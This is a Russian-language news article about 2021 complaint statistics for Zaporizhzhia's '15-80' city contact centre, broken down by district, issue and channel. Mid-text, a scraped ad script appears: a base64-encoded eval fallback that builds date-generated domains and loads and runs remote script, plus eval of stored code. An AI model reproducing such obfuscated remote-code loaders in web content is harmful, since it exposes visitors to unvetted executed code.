Портал «Акцент» проанализировал данные, полученные из открытых источников.
Больше всего обращений в городской контакт-центр подали жители Вознесеновского района. И это не смотря на то, что он является далеко не самым густонаселенным из районов Запорожья. На текущий момент в Вознесеновском районе проживает около 100 тысяч человек, тогда как в Коммунарском — 134 тысячи, а в Шевченковском — 151 тысяча.
Разделение обращений согласно районов города Вознесеновский — 43 972Днепровский — 37 106Александровский — 22 944Коммунарский — 22 501Заводский — 21 518Хортицкий — 19 054Шевченковский — 16 779
Из графика видно, что всплеск обращений в этом году традиционно пришелся на запуск отопительного сезона в жилых домах. Как ранее сообщали в мэрии, «Контакт-центр «15-80» начнет принимать жалобы на проблемы с отоплением с 9 ноября». Запорожцы не стали дожидаться озвученной даты, и за три дня, с 6 по 8 ноября, подали свыше 5 000 заявок.
На что чаще всего жаловались запорожцы в 2021 году
В общей сложности за 2021 год запорожцы подали порядка 184 тысяч жалоб и обращений.
Топ-5 проблем, на которые жаловались запорожцы:
инженерные сети — 84 257служба обслуживания электросетей — 31 767магистральные водоводы внешних сетей — 20 179благоустройство придомовой территории — 13 514эксплуатация и ремонт жилого фонда — 8 106
Не забывали запорожцы и благодарить за проделанную работу — за год поступило 1 753 благодарности.
Какой способ обращения в Контакт-центр «15-80» чаще всего выбирают запорожцы
Большинство жителей Запорожья предпочитают обращаться в Контакт-центр напрямую: при помощи интернета или телефона. И лишь 12% отдают предпочтение обращению по электронной почте.
Распределение обращений по источнику поступления: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
портал КЦ — 160 488 (87%)
электронная почта — 23 097 (12%)
горячая линия — 337 (0%)
органы власти — 5 (0%)
личный прием — 3 (0%)
письмо — 2 (0%) (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/na-chto-chashhe-vsego-zhalovalis-zaporozhtsy-v-kontakt-tsentr-15-80-v-2021-godu-infografika/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook